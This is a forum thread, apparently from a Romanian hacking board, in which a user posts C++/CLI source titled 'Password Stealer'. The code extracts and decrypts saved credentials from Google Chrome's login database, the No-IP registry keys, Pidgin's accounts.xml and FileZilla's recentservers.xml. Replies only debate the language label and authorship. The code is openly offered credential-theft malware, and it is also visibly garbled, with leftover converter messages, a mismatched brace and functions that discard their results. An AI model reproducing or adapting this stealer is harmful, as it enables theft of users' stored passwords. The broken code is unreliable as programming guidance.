Jump to content
M.cod3r

[C++] Password Stealer

Recommended Posts

Posted (edited)

Google chrome


public:
void StealChrome()
{converted by Instant C++:
System::String ^cpass = System::String::empty;
System::String ^datapath = Environment::GetFolderPath(Environment::SpecialFolder::LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Web Data";
if (File::Exists(datapath))
{
SqlClient::SqlConnection ^SQLconnect = gcnew SqlClient::SqlConnection();
SqlClient::SqlCommand ^SQLcommand = nullptr;
SQLconnect->ConnectionString = "Data Source=" + datapath + ";";
SQLconnect->Open();
SQLcommand = SQLconnect->CreateCommand();
SQLcommand->CommandText = "SELECT * FROM logins";
SqlClient::SqlDataReader ^SQLreader = SQLcommand->ExecuteReader();
System::String ^host = nullptr;
System::String ^user = nullptr;
System::String ^pass = nullptr;
while (SQLreader->Read())
{
host = SQLreader["origin_url"];
user = SQLreader["username_value"];
pass = Decrypt(SQLreader["password_value"]);
if ((user != "") & (pass != ""))
{
pss->Text = host;
cpass = ("=============================" + System::Environment::NewLine + "Host: " + host + System::Environment::NewLine + "Username: " + user + System::Environment::NewLine + "Password: " + pass + System::Environment::NewLine + "=============================" + System::Environment::NewLine + " ");
}
}
delete SQLcommand;
SQLconnect->Close();
}

}
private:
[DllImport("Crypt32.dll", SetLastError=true, CharSet=System::Runtime::InteropServices::CharSet::Auto)]
static bool CryptUnprotectData(DATA_BLOB %pDataIn, System::String ^szDataDescr, DATA_BLOB %pOptionalEntropy, IntPtr pvReserved, CRYPTPROTECT_PROMPTSTRUCT %pPromptStruct, int dwFlags, DATA_BLOB %pDataOut);
[Flags()]
private enum class CryptProtectPromptFlags: int
{
CRYPTPROTECT_PROMPT_ON_UNPROTECT = 0X1,
CRYPTPROTECT_PROMPT_ON_PROTECT = 0X2
};
[StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
private value class CRYPTPROTECT_PROMPTSTRUCT
{
public:
int cbSize;
CryptProtectPromptFlags dwPromptFlags;
IntPtr hwndApp;
System::String ^szPrompt;
};
[StructLayout(LayoutKind::Sequential, CharSet=CharSet::Unicode)]
private value class DATA_BLOB
{
public:
int cbData;
IntPtr pbData;
};
public:
static System::String ^Decrypt(array<System::Byte> ^Datas)
{
DATA_BLOB inj = DATA_BLOB();
DATA_BLOB Ors = DATA_BLOB();
GCHandle Ghandle = GCHandle::Alloc(Datas, GCHandleType::Pinned);
inj.pbData = Ghandle.AddrOfPinnedObject();
inj.cbData = Datas->Length;
Ghandle.Free();
DATA_BLOB temppOptionalEntropy1 = DATA_BLOB();
CRYPTPROTECT_PROMPTSTRUCT temppPromptStruct2 = CRYPTPROTECT_PROMPTSTRUCT();
CryptUnprotectData(inj, nullptr, temppOptionalEntropy1, System::IntPtr::Zero, temppPromptStruct2, 0, Ors);
array<System::Byte> ^Returned = gcnew array<System::Byte>(Ors.cbData + 1);
Marshal::Copy(Ors.pbData, Returned, 0, Ors.cbData);
System::String ^TheString = Encoding::Default->GetString(Returned);
return TheString->Substring(0, TheString->Length - 1);
}
};

No-ip:


public:
System::String ^NoIPSteal()
{
IpRecord = nullptr;
System::String ^Username = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Username", nullptr);
System::String ^Password = Microsoft::Win32::Registry::GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC", "Password", nullptr);
System::String ^NL = System::Environment::NewLine;
IpRecord = "===========No-Ip=============" + NL + "Username : " + Username + System::Environment::NewLine + "Password : " + base64Decode(Password) + System::Environment::NewLine + "=============================" + NL;must return a value in C++:
return nullptr;
}
private:
System::String ^Base64Dec0de(System::String ^%Base64String)
{
static array<System::Byte> ^Enc = nullptr;
array<System::Byte> ^b = nullptr;
array<System::Byte> ^Out = nullptr;
int i = 0;
int j = 0;
int L = 0;
array<System::Byte> ^Dec = gcnew array<System::Byte>(256);
if (Enc->Length == 0) //byval 0&-Ptr = not initialized
{
Enc = System::Text::ASCIIEncoding::ASCII->GetBytes("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
}
for (i = 0; i <= 255; i++)
{
Dec[i] = 64;
}
for (i = 0; i <= 63; i++)
{
Dec[Enc[i]] = System::Convert::ToByte(i);
}
L = Base64String->Length;
b = System::Text::ASCIIEncoding::ASCII->GetBytes(Base64String);
Array::Resize(Out, (L / 4) * 3);
for (i = 0; i <= b->GetUpperBound(0); i += 4)
{
Out[j] = System::Convert::ToByte((Dec[b[i]] * 4) | (Dec[b[i + 1]] / 16));
j = j + 1;
Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 1]] & 15) * 16 | (Dec[b[i + 2]] / 4));
j = j + 1;
Out[j] = System::Convert::ToByte(System::Convert::ToInt16(Dec[b[i + 2]] & 3) * 64 | Dec[b[i + 3]]);
j = j + 1;
}
if (b[L - 2] == 61)
{
j = 2;
}
else if (b[L - 1] == 61)
{
j = 1;
}
else
{
j = 0;
}
Array::Resize(Out, Out->GetUpperBound(0) - j + 1);
Base64Dec = System::Text::ASCIIEncoding::ASCII->GetString(Out);must return a value in C++:
return nullptr;
}

Pidgin:

public:
System::String ^PidginSteal()
{
System::String ^tempPidginSteal = nullptr;
XmlDocument ^ReadXML = gcnew XmlDocument();
int i = 0;
System::Object ^OutAll = nullptr;
tempPidginSteal = "";
System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("appdata") + "\\.purple\\accounts.xml";
if (File::Exists(FilePath) != true)
{
return tempPidginSteal;
}
else
{
try
{
ReadXML->Load(FilePath);
XmlNodeList ^Protocol = ReadXML->GetElementsByTagName("protocol");
XmlNodeList ^Username = ReadXML->GetElementsByTagName("name");
XmlNodeList ^Password = ReadXML->GetElementsByTagName("password");
for (i = 0; i < Protocol->Count; i++)
{
OutAll = OutAll->ToString() + "============Pidgin===========" + System::Environment::NewLine + "Protocol: " + Protocol[i]->InnerText + "\r\n" + "Username: " + Username[i]->InnerText + "\r\n" + "Password: " + Password[i]->InnerText + "\r\n" + System::Environment::NewLine + "=============================" + System::Environment::NewLine;
}
tempPidginSteal = OutAll;
}
catch (Exception ^ex)
{
}
}
return tempPidginSteal;
)

Fillezila


public:
System::String ^FileZillaSteal()
{
System::String ^FilePath = Microsoft::VisualBasic::Interaction::Environ("APPDATA") + "\\FileZilla\\recentservers.xml";
System::String ^FileBuffer = Microsoft::VisualBasic::Constants::vbNull;
System::String ^NL = System::Environment::NewLine;
FileBuffer = Microsoft::VisualBasic::FileIO::FileSystem::OpenTextFileReader(FilePath)::ReadTo???End();
System::String ^str = nullptr;
System::String ^Output = nullptr;
array<System::String^> ^TempData = nullptr;
TempData = FileBuffer->Split("\r\n");
FileBuffer = nullptr;
for each (System::String ^str in TempData)
{
if (str->Contains("</Host>"))
{
str->Replace("<Host>", "")->Replace("</Host>", "");
Output = Output + "Host : " + str + NL;
}
if (str->Contains("</User>"))
{
str->Replace("<User>", "")->Replace("</User>", "");
Output = Output + "Username : " + str + NL;
}
if (str->Contains("</Pass>"))
{
str->Replace("<Pass>", "")->Replace("</Pass>", "");
Output = Output + "Password : " + str + NL + NL;
}
}
Output = "=============FileZilla================" + System::Environment::NewLine + Output->Replace("<User>", "")->Replace("</User>", "")->Replace("<Host>", "")->Replace("</Host>", "")->Replace("<Pass>", "")->Replace("</Pass>", "") + System::Environment::NewLine + "=============FileZilla================" + System::Environment::NewLine;
ShoitZilla = Output;must return a value in C++:
return nullptr;
}

Edited by M.cod3r
!UPDATE.
Posted

Salut, te rog sa modifici in titlul topicului din [C++] in [C++/CLI], codul este in varianta de c++ ce este detinuta de microsoft si include componente .net. Nu este c++ curat.

Posted (edited)
Respectele mele daca ii facut de tine.

L.E.:Mai dezamagit: ??? [C++] Password Stealer Codes

Cu tot respectul nu este f?cut 100% de mine , ! ?i dac? ai observat este o alt? variant? cu totul ?i cu totul diferit? fat? de ce-mi ar??i tu. !

Salut, te rog sa modifici in titlul topicului din [C++] in [C++/CLI], codul este in varianta de c++ ce este detinuta de microsoft si include componente .net. Nu este c++ curat.

Rezolvat !

Edited by TheTime
post dublu

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...